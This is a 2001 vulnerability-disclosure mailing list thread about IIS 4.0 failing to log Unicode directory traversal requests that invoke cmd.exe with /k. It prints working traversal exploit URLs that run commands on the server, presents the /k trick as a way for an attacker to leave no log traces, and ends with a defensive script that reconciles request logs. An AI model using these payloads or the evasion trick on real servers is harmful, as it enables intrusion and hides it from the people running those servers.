Vulnerability Development mailing list archives

RE: sometimes IIS 4.0 don't write logs.


From: Pablo Aravena <p.aravena () bysecure com>
Date: Thu, 20 Dec 2001 09:48:45 -0400

The problem looks like this:

        CMD /K [command]  Executes a command and remains active.
        CMD /C [command]  Executes a command and then finishes.

        If you execute a cmd.exe?/k request, it stays in an active state
        until the process is finished, unlike a cmd.exe?/c request,
        which finishes the process immediately.  Because of this, IIS
        does not log the process that has not come to an end.
                

Sincerely,
Pablo Aravena Martínez
Security Consultant
BYSECURE CSE S.A.
PGP FingerPrint: 4109 41C1 A295 75D8 F159  D542 96C5 5E6D 2B08 F28A
http://www.bysecure.com
mailto:p.aravena () bysecure com


-----Original Message-----
From:    ThEye [SMTP:theye () 350cc com]
Sent:    Thursday, December 20, 2001 0:39
To:      vuln-dev () securityfocus com
CC:      ndr113 () 350cc com
Subject: sometimes IIS 4.0 don't write logs.

Hi:

I don't know if this problem is documented, but I didn't find anything
about it anywhere.

The problem is the following one:

+ Problem:
When I was playing with "Microsoft IIS and PWS Extended Unicode Directory
Traversal Vulnerability" ( BugtraqID = 1806 ) I found that if the attacker
uses the "k" option of cmd ( cmd /k ) instead of the "c" option (cmd /c),
IIS 4.0 (with Extended Unicode Directory Traversal Vulnerability)
sometimes doesn't write logs of the attacker's activity.

+ Implications:
If an attacker uses this vulnerability to crack a web page or anything, 
eventually no tracks will exist on the attacked server.

+ Final:
In PROBLEM I said "sometimes" because after a high number of requests to
"cmd /k", IIS 4.0 writes logs of some requests; I still don't know when
and why IIS 4.0 writes logs of the "cmd /k" request.
Anyone that can confirm or refute this please post it.


+ Exploit:
I tested this problem on Windows NT Server 4.0 with IIS 4.0 just installed
( without any patch ).

http://server.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/k+dir
http://server.com/scripts/..%c0%af../winnt/system32/cmd.exe?/k+dir
http://server.com/msadc/..%c1%pc../winnt/system32/cmd.exe?/k+dir
http://server.com/msadc/..%c0%af../winnt/system32/cmd.exe?/k+dir

Result: No tracks on log files.

+ More Information:
1) Microsoft IIS and PWS Extended Unicode Directory Traversal
   http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=1806
2) Microsoft Patch prmcan4i
   http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/EN-US/prmcan4i.exe

Roberto Alamos M. (theye () 350cc com)
www.350cc.com
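
If requests can go unlogged as this thread reports, the IIS log alone cannot confirm what reached the server. The following is an added example, not part of either poster's message: it reconciles a second request record (for instance from an IDS or proxy) against the IIS W3C extended log and lists requests with no logged counterpart. The upstream record format, all sample lines and the function names are constructed assumptions.

```python
from collections import Counter

# Constructed sample data (not from the original posts). The upstream format is
# hypothetical: "date time client-ip method raw-url", as an IDS or proxy might keep.
UPSTREAM = """\
2001-12-20 04:39:01 192.0.2.10 GET /default.htm
2001-12-20 04:39:07 192.0.2.66 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
2001-12-20 04:39:15 192.0.2.66 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/k+dir
2001-12-20 04:39:21 192.0.2.66 GET /msadc/..%c0%af../winnt/system32/cmd.exe?/k+dir
"""

# Constructed IIS W3C extended log; the two /k requests are absent, as the post reports.
IIS_LOG = """\
#Software: Microsoft Internet Information Server 4.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-12-20 04:39:01 192.0.2.10 GET /default.htm - 200
2001-12-20 04:39:07 192.0.2.66 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200
"""

def key(ip, method, stem, query):
    # Compare on the last path segment only: the server may log a decoded or
    # normalised stem, so raw and logged paths need not match byte for byte.
    return (ip, method.upper(), stem.rsplit("/", 1)[-1].lower(), query or "-")

def iis_keys(text):
    """Count logged requests per key, using the #Fields header to name columns."""
    fields, seen = [], Counter()
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            seen[key(row["c-ip"], row["cs-method"],
                     row["cs-uri-stem"], row["cs-uri-query"])] += 1
    return seen

def unlogged(upstream_text, iis_text):
    """Return upstream records that have no matching entry left in the IIS log."""
    remaining, missing = iis_keys(iis_text), []
    for line in upstream_text.splitlines():
        date, time, ip, method, url = line.split(None, 4)
        stem, _, query = url.partition("?")
        k = key(ip, method, stem, query)
        if remaining[k] > 0:
            remaining[k] -= 1  # consume one logged entry per observed request
        else:
            missing.append((date, time, ip, url))
    return missing

if __name__ == "__main__":
    for rec in unlogged(UPSTREAM, IIS_LOG):
        print("seen upstream, absent from IIS log:", *rec)
```

The match ignores timestamps, so it assumes both sources cover the same time window.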

